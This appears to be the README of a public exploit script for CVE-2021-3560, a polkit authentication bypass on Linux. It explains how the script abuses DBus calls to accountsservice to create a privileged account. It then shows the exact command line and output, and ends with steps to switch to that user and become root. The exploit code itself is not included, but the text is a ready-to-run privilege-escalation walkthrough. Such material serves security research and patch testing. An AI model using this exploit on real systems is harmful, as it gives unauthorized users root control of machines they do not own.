Privilege escalation with polkit - CVE-2021-3560
CVE-2021-3560 is an authentication bypass on polkit, which allows unprivileged user to call privileged methods using DBus, in this exploit we will call 2 privileged methods provided by accountsservice (CreateUser and SetPassword), which allows us to create a priviliged user then setting a password to it and at the end logging as the created user and then elevate to root.
Original exploit author: Kevin Backhouse. Exploit code written by Ahmad Almorabea @almorabea and modified by @tigre-bleu (added credentials configuration)
test@ubuntu:~/Desktop$ python3 CVE-2021-3560.py -u toto -p toto -d "Pwned user"
[+]Starting the Exploit
[+] User Created with the name of toto
[+] Timed out at: 0.008446890996407191
[+] Timed out at: 0.008934336684707084
[+] Exploit Completed, Your new user is 'toto' just log into it like, 'su toto' using password 'toto', and then 'sudo su' to root
Ahmad Almorabea @almorabea (http://almorabea.net) Kevin Backhouse (https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/)